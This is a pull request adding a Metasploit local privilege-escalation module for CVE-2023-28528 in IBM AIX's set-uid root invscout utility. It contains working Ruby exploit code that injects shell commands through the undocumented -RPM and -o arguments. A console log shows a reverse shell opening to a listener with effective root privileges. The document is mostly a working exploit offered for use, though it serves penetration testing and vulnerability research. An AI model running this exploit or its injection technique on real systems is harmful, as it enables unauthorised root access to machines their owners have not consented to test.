### PR TITLE
Add invscout RPM Privilege Escalation

### DIFF
--- a/documentation/modules/exploit/aix/local/invscout_rpm_priv_esc.md
+++ b/documentation/modules/exploit/aix/local/invscout_rpm_priv_esc.md
@@ -1,0 +1,58 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in IBM AIX
+invscout set-uid root utility present in AIX 7.2 and earlier.
+
+The undocumented -rpm argument can be used to install an RPM file;
+and the undocumented -o argument passes arguments to the rpm utility
+without validation, leading to command injection with effective-uid
+root privileges.
+
+This module has been tested successfully on AIX 7.2.
+
+## Verification Steps
+
+1. `msfconsole`
+1. Get a session
+1. `use exploit/aix/local/invscout_rpm_priv_esc`
+1. `set session <session>`
+1. `run`
+
+## Options
+
+### INVSCOUT_PATH
+
+Path to invscout executable (default: `/usr/sbin/invscout`)
+
+## Scenarios
+
+### IBM AIX 7.2
+
+```
+msf6 > use exploit/aix/local/invscout_rpm_priv_esc
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > set session 1
+session => 1
+msf6 exploit(aix/local/invscout_rpm_priv_esc) > run
+
+[*] Started reverse TCP double handler on 192.168.200.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Output: uid=204(user) gid=1(staff) euid=0(root)
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo 9BZSm5LKtW9OMKHg;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "9BZSm5LKtW9OMKHg\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:49036) at 2023-05-13 18:29:23 -0400
+
+id
+uid=204(user) gid=1(staff) euid=0(root)
+uname -a
+AIX localhost 2 7 000000000000
+```

--- a/modules/exploits/aix/local/invscout_rpm_priv_esc.rb
+++ b/modules/exploits/aix/local/invscout_rpm_priv_esc.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'invscout RPM Privilege Escalation',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in IBM AIX
+          invscout set-uid root utility present in AIX 7.2 and earlier.
+
+          The undocumented -rpm argument can be used to install an RPM file;
+          and the undocumented -o argument passes arguments to the rpm utility
+          without validation, leading to command injection with effective-uid
+          root privileges.
+
+          This module has been tested successfully on AIX 7.2.
+        },
+        'Author' => [
+          'Tim Brown', # Discovery and PoC
+          'bcoles' # Metasploit
+        ],
+        'References' => [
+          ['CVE', '2023-28528'],
+          ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],
+        ],
+        'Platform' => %w[unix aix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'BadChars' => "\x00\x0a\x0d\x22",
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic telnet openssl'
+          }
+        },
+        'DefaultOptions' => {
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependFork' => true
+        },
+        'SessionTypes' => %w[shell meterpreter],
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-04-24',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', '/usr/sbin/invscout'])
+    ])
+  end
+
+  def invscout_path
+    datastore['INVSCOUT_PATH']
+  end
+
+  def check
+    return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)
+
+    res = execute_command('id')
+    id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s
+
+    return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')
+
+    CheckCode::Vulnerable("Output: #{id}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"
+    rpm_args = "; #{cmd}; echo "
+    res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")
+    vprint_line(res) unless res.blank?
+    res
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+end


### PR DESCRIPTION
Lazy implementation. Gets euid root, not uid root. We could `setuid()` but `gcc` is not installed by default.

`ARCH_CMD` only. We don't have Meterpreter payloads for AIX.

To emulate AIX refer to:

* https://aix4admins.blogspot.com/2020/04/qemu-aix-on-x86-qemu-quick-emulator-is.html
* http://maas.hu/learning/it/sysadmin/qemu/

